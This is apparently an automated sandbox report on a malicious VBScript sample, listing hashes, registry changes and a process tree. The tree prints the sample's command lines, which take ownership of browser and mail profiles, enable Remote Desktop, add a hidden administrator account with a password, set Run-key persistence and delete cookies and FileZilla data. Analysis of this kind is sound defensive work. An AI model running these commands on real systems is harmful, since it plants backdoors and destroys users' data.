Analysis
max time kernel: 22s
max time network: 156s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-10-2022 15:20
Static task: static1
Behavioral task: behavioral1
  Sample: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
  Resource: win7-20220901-en
Behavioral task: behavioral2
  Sample: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
  Resource: win10v2004-20220901-en
General
Target: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Size: 181KB
MD5: 91f6b90fc19be94b62bb3ec2ff60fc30
SHA1: ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA256: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512: ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
SSDEEP: 1536:bTRRRRRRRRRRRRRRRRRRRRRRRVjxxxxxxxxxxxxxxxxx96df:bD6F
Malware Config
Signatures
- Modifies visibility of hidden/system files in Explorer (2 TTPs, 1 IoCs)
  Processes: WScript.exe
  description | ioc | process
  Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | WScript.exe
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Adds policy Run key to start application (2 TTPs, 4 IoCs)
  Processes: WScript.exe, SystemProtection.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | WScript.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\"" | WScript.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | SystemProtection.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\"" | SystemProtection.exe
- Disables RegEdit via registry modification (2 IoCs)
  Processes: WScript.exe, SystemProtection.exe
  description | ioc | process
  Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" | WScript.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" | SystemProtection.exe
- Disables Task Manager via registry modification
- Executes dropped EXE (1 IoCs)
  Processes: SystemProtection.exe
  pid process: 4952 SystemProtection.exe
- Modifies Windows Firewall (1 TTPs, 1 IoCs)
- Possible privilege escalation attempt (26 IoCs)
  Processes: takeown.exe, icacls.exe
  pid process: 3180 takeown.exe, 3456 icacls.exe, 3168 takeown.exe, 1212 takeown.exe, 3908 takeown.exe, 3352 takeown.exe, 508 takeown.exe, 5104 takeown.exe, 4232 takeown.exe, 1496 takeown.exe, 960 takeown.exe, 2764 icacls.exe, 4376 icacls.exe, 1668 takeown.exe, 4776 takeown.exe, 208 takeown.exe, 1384 takeown.exe, 4868 takeown.exe, 2572 takeown.exe, 852 takeown.exe, 1364 icacls.exe, 1880 takeown.exe, 4400 takeown.exe, 1092 takeown.exe, 400 takeown.exe, 4960 takeown.exe
- Sets file to hidden (1 TTPs, 3 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
  Processes: attrib.exe
  pid process: 5116 attrib.exe, 4488 attrib.exe, 4224 attrib.exe
- Checks computer location settings (2 TTPs, 4 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: WScript.exe, SystemProtection.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | SystemProtection.exe
- Drops startup file (4 IoCs)
  Processes: WScript.exe, SystemProtection.exe
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe | WScript.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe | WScript.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe | SystemProtection.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe | SystemProtection.exe
- Modifies file permissions (1 TTPs, 26 IoCs)
  Processes: takeown.exe, icacls.exe
  pid process: 1668 takeown.exe, 2572 takeown.exe, 3180 takeown.exe, 4232 takeown.exe, 1496 takeown.exe, 4400 takeown.exe, 4960 takeown.exe, 4376 icacls.exe, 1364 icacls.exe, 1092 takeown.exe, 3908 takeown.exe, 1212 takeown.exe, 1880 takeown.exe, 960 takeown.exe, 4868 takeown.exe, 3456 icacls.exe, 852 takeown.exe, 2764 icacls.exe, 3168 takeown.exe, 3352 takeown.exe, 4776 takeown.exe, 208 takeown.exe, 1384 takeown.exe, 5104 takeown.exe, 400 takeown.exe, 508 takeown.exe
- Checks whether UAC is enabled
  Processes: WScript.exe, SystemProtection.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | WScript.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | SystemProtection.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies registry class (4 IoCs)
  Processes: SystemProtection.exe, reg.exe, WScript.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | SystemProtection.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon\ = "C:\\Windows\\system32\\shell32.dll,1" | reg.exe
  Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | WScript.exe
- Runs net.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: takeown.exe, vssvc.exe
  description | pid | process
  Token: SeTakeOwnershipPrivilege | 5104 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 852 | takeown.exe
  Token: SeBackupPrivilege | 3540 | vssvc.exe
  Token: SeRestorePrivilege | 3540 | vssvc.exe
  Token: SeAuditPrivilege | 3540 | vssvc.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: WScript.exe, cmd.exe
  description | pid | process | target process
  PID 1884 wrote to memory of 1020 | 1884 | WScript.exe | cmd.exe
  PID 1884 wrote to memory of 1020 | 1884 | WScript.exe | cmd.exe
  PID 1020 wrote to memory of 4168 | 1020 | cmd.exe | mode.com
  PID 1020 wrote to memory of 4168 | 1020 | cmd.exe | mode.com
  PID 1020 wrote to memory of 4360 | 1020 | cmd.exe | cmd.exe
  PID 1020 wrote to memory of 4360 | 1020 | cmd.exe | cmd.exe
  PID 1020 wrote to memory of 4376 | 1020 | cmd.exe | find.exe
  PID 1020 wrote to memory of 4376 | 1020 | cmd.exe | find.exe
  PID 1020 wrote to memory of 2128 | 1020 | cmd.exe | cmd.exe
  PID 1020 wrote to memory of 2128 | 1020 | cmd.exe | cmd.exe
  PID 1020 wrote to memory of 4980 | 1020 | cmd.exe | find.exe
  PID 1020 wrote to memory of 4980 | 1020 | cmd.exe | find.exe
  PID 1884 wrote to memory of 1284 | 1884 | WScript.exe | cmd.exe
  PID 1884 wrote to memory of 1284 | 1884 | WScript.exe | cmd.exe
  PID 1284 wrote to memory of 2572 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 2572 | 1284 | cmd.exe | takeown.exe
  PID 1884 wrote to memory of 236 | 1884 | WScript.exe | cmd.exe
  PID 1884 wrote to memory of 236 | 1884 | WScript.exe | cmd.exe
  PID 1284 wrote to memory of 208 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 208 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 4380 | 1284 | cmd.exe | cacls.exe
  PID 1284 wrote to memory of 4380 | 1284 | cmd.exe | cacls.exe
  PID 236 wrote to memory of 744 | 236 | cmd.exe | cmd.exe
  PID 236 wrote to memory of 744 | 236 | cmd.exe | cmd.exe
  PID 236 wrote to memory of 4588 | 236 | cmd.exe | reg.exe
  PID 236 wrote to memory of 4588 | 236 | cmd.exe | reg.exe
  PID 1284 wrote to memory of 3680 | 1284 | cmd.exe | cacls.exe
  PID 1284 wrote to memory of 3680 | 1284 | cmd.exe | cacls.exe
  PID 236 wrote to memory of 2148 | 236 | cmd.exe | xcopy.exe
  PID 236 wrote to memory of 2148 | 236 | cmd.exe | xcopy.exe
  PID 1284 wrote to memory of 3180 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 3180 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 4232 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 4232 | 1284 | cmd.exe | takeown.exe
  PID 236 wrote to memory of 1876 | 236 | cmd.exe | xcopy.exe
  PID 236 wrote to memory of 1876 | 236 | cmd.exe | xcopy.exe
  PID 1284 wrote to memory of 1880 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 1880 | 1284 | cmd.exe | takeown.exe
  PID 236 wrote to memory of 4852 | 236 | cmd.exe | xcopy.exe
  PID 236 wrote to memory of 4852 | 236 | cmd.exe | xcopy.exe
  PID 1284 wrote to memory of 1496 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 1496 | 1284 | cmd.exe | takeown.exe
  PID 236 wrote to memory of 4240 | 236 | cmd.exe | attrib.exe
  PID 236 wrote to memory of 4240 | 236 | cmd.exe | attrib.exe
  PID 1284 wrote to memory of 1384 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 1384 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 960 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 960 | 1284 | cmd.exe | takeown.exe
  PID 236 wrote to memory of 4224 | 236 | cmd.exe | attrib.exe
  PID 236 wrote to memory of 4224 | 236 | cmd.exe | attrib.exe
  PID 1284 wrote to memory of 4868 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 4868 | 1284 | cmd.exe | takeown.exe
  PID 236 wrote to memory of 5116 | 236 | cmd.exe | attrib.exe
  PID 236 wrote to memory of 5116 | 236 | cmd.exe | attrib.exe
  PID 1284 wrote to memory of 5104 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 5104 | 1284 | cmd.exe | takeown.exe
  PID 236 wrote to memory of 3720 | 236 | cmd.exe | xcopy.exe
  PID 236 wrote to memory of 3720 | 236 | cmd.exe | xcopy.exe
  PID 1284 wrote to memory of 3456 | 1284 | cmd.exe | icacls.exe
  PID 1284 wrote to memory of 3456 | 1284 | cmd.exe | icacls.exe
  PID 236 wrote to memory of 4180 | 236 | cmd.exe | xcopy.exe
  PID 236 wrote to memory of 4180 | 236 | cmd.exe | xcopy.exe
  PID 1284 wrote to memory of 852 | 1284 | cmd.exe | takeown.exe
  PID 1284 wrote to memory of 852 | 1284 | cmd.exe | takeown.exe
- System policy modification (1 TTPs, 2 IoCs)
  Processes: WScript.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate | WScript.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate = "33" | WScript.exe
- Views/modifies file attributes (1 TTPs, 4 IoCs)
  Processes: attrib.exe
  pid process: 4240 attrib.exe, 4224 attrib.exe, 5116 attrib.exe, 4488 attrib.exe
Processes (tree depth in brackets; image path, then command line, then matched signatures)
[1] C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"
    - Adds policy Run key to start application
    - Disables RegEdit via registry modification
    - Checks computer location settings
    - Drops startup file
    - Checks whether UAC is enabled
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    - System policy modification
  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\mode.com
        mode con lines=1 cols=14
    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" ver "
    [3] C:\Windows\system32\find.exe
        find /i "version 6.1."
    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" ver "
    [3] C:\Windows\system32\find.exe
        find /i "version 6.0."
  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\takeown.exe
        takeown /F C:\kernel /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F C:\system32 /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\cacls.exe
        CACLS C:\Kernel /E /T /C /G Admin:F
    [3] C:\Windows\system32\cacls.exe
        CACLS C:\system32 /E /T /C /G Admin:F
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "%userproflie%\cookies" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Windows\system32\drivers" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /a /f C:\Windows\System32\wscript.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /a /f C:\Windows\System32\drivers\flpydisk.sys
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F
        - Possible privilege escalation attempt
        - Modifies file permissions
  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"
    [3] C:\Windows\system32\reg.exe
        reg add "HKCR\VBEFile\DefaultIcon" /v "" /t "REG_SZ" /d "C:\Windows\system32\shell32.dll,1" /f
        - Modifies registry class
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\kernel\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\Users\Admin\AppData\Local\Temp\"
    [3] C:\Windows\system32\attrib.exe
        attrib -s -h "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"
        - Views/modifies file attributes
    [3] C:\Windows\system32\attrib.exe
        attrib +s +h "C:\system32"
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\system32\attrib.exe
        attrib +s +h "C:\kernel"
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\system32\"
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\kernel\"
    [3] C:\Windows\system32\attrib.exe
        attrib +s +h "C:\kernel\r00t3r"
        - Sets file to hidden
        - Views/modifies file attributes
  [2] C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"
      - Checks computer location settings
  [2] C:\system32\SystemProtection.exe
      "C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\system32\blood.dat
      - Adds policy Run key to start application
      - Disables RegEdit via registry modification
      - Executes dropped EXE
      - Checks computer location settings
      - Drops startup file
      - Checks whether UAC is enabled
      - Modifies registry class
    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "
      [4] C:\Windows\system32\mode.com
          mode con lines=1 cols=14
      [4] C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" ver "
      [4] C:\Windows\system32\find.exe
          find /i "version 6.1."
      [4] C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" ver "
      [4] C:\Windows\system32\find.exe
          find /i "version 6.0."
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT
      [4] C:\Windows\system32\takeown.exe
          takeown /F C:\kernel /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F C:\system32 /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\cacls.exe
          CACLS C:\Kernel /E /T /C /G Admin:F
      [4] C:\Windows\system32\cacls.exe
          CACLS C:\system32 /E /T /C /G Admin:F
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "%userproflie%\cookies" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Windows\system32\drivers" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /a /f C:\Windows\System32\wscript.exe
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe
          ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /a /f C:\Windows\System32\drivers\flpydisk.sys
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe
          ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F
          - Possible privilege escalation attempt
          - Modifies file permissions
    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "
      [4] C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"
    [3] C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"
        - Checks computer location settings
    [3] C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sdf.vbs"
        - Modifies visibility of hidden/system files in Explorer
    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\system32\bkr.bat" "
      [4] C:\Windows\system32\netsh.exe
          netsh firewall set service type=remotedesktop mode=enable scope=all
          - Modifies Windows Firewall
      [4] C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      [4] C:\Windows\system32\net.exe
          net user timalin /delete
        [5] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user timalin /delete
      [4] C:\Windows\system32\net.exe
          net user NTUSER /delete
      [4] C:\Windows\system32\net.exe
          net user /add HelpAssistant jevoussalue
        [5] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user /add HelpAssistant jevoussalue
      [4] C:\Windows\system32\net.exe
          net localgroup Administrators /add NTUSER
        [5] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup Administrators /add NTUSER
      [4] C:\Windows\system32\net.exe
          net localgroup Administrateurs /add NTUSER
        [5] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup Administrateurs /add NTUSER
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v HelpAssistant /t REG_DWORD /d 0 /f
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin" & rd/q/s Windows & rd/q/s s4t4n & rd/q/s Microsoft & rd/q/s Securities & cd/d C:\Windows\system32\drivers & ren flpydisk.sys flpydisk.sy_ & del/f/q/a C:\system\*.* & EXIT
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K CD/D "C:\Users\Admin\COOKIES" & Del/f/q/a *.* & EXIT
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\Application Data\Skype" & rd/s/q "C:\Users\Admin\Application Data\Skype" & EXIT
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\opera" & del/f/q opera & EXIT
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\FileZilla" & del/f/q sitemanager.xml & EXIT
  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /K cd/d "C:\system32" & echo done >>"C:\system32\r0k.rk" & EXIT
[1] C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user NTUSER /delete
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\sdf.vbs
  Filesize: 327B
  MD5: 031c3f01fd6505397cae931dbdf3bfdb
  SHA1: d20fdee4d60f60b957ccf742130ba56485eae8c6
  SHA256: b0603aa4a03646b48636653a8f950cf996ef351ff9f909b244b6b79ba15aa63a
  SHA512: d1c5394d41782b1a896e7a6c63e7ebf5f72c27b2bc7efb4fbe393052374e7939ad2ad3a5d4422b42547d06bb4a955b47591cd5458f3d64e9b2c5614e62132457
- C:\Users\Admin\AppData\Local\Temp\tmp.bat
  Filesize: 1KB
  MD5: 45b08f10911ca031d2b3682a109d64d8
  SHA1: 70c69c39ee4dff16594d61e43abd0ae9cba024f4
  SHA256: db4b9ec1266f1088f610d217d6503aeb2b4b88dfc98b831b257bf1208add5b20
  SHA512: 1d98beca47ca7c7cf2de6e09545bdffb608228cbd1d845a61779fb8665a987f28bd848b3363530215860eb0a6ed0078ebdd88efdf63ac140b5988a621692fb53
- C:\Users\Admin\AppData\Local\Temp\tmp.bat
  Filesize: 1KB
  MD5: 659ce8e39a97c207cb7b7772fac6bbbe
  SHA1: 482911c7f725ee815c5cf1a52ff65809be1d83ff
  SHA256: 620daa8294456838bb9323383424bf704bbadbaaa0890ce96cf04d017925e47a
  SHA512: eb436ee66ef4f36ecc5664dcb5268b6430cd12c085208d84b43fded8a65658c7c305a1109dfd45341c677c892553ca668596267ab916f432ec80ac7bd82dad47
- C:\Users\Admin\AppData\Local\Temp\tmp.vbe
  Filesize: 2KB
  MD5: b4725c8a0d996c389273664a63759590
  SHA1: 219ae39177633b65c451d07fb2fe2ff739811032
  SHA256: 8c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
  SHA512: b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
- C:\Users\Admin\AppData\Local\Temp\uac.bat
  Filesize: 1KB
  MD5: e2930c13dcc510ff3e677f744c13fcf2
  SHA1: d1bdcd06108a6bf848cf72181003ea587d1fbdb1
  SHA256: a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
  SHA512: 6a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
- C:\kernel\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
  Filesize: 181KB
  MD5: 91f6b90fc19be94b62bb3ec2ff60fc30
  SHA1: ed92e88998bf8ed11994291fbdcdebf7272249fa
  SHA256: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
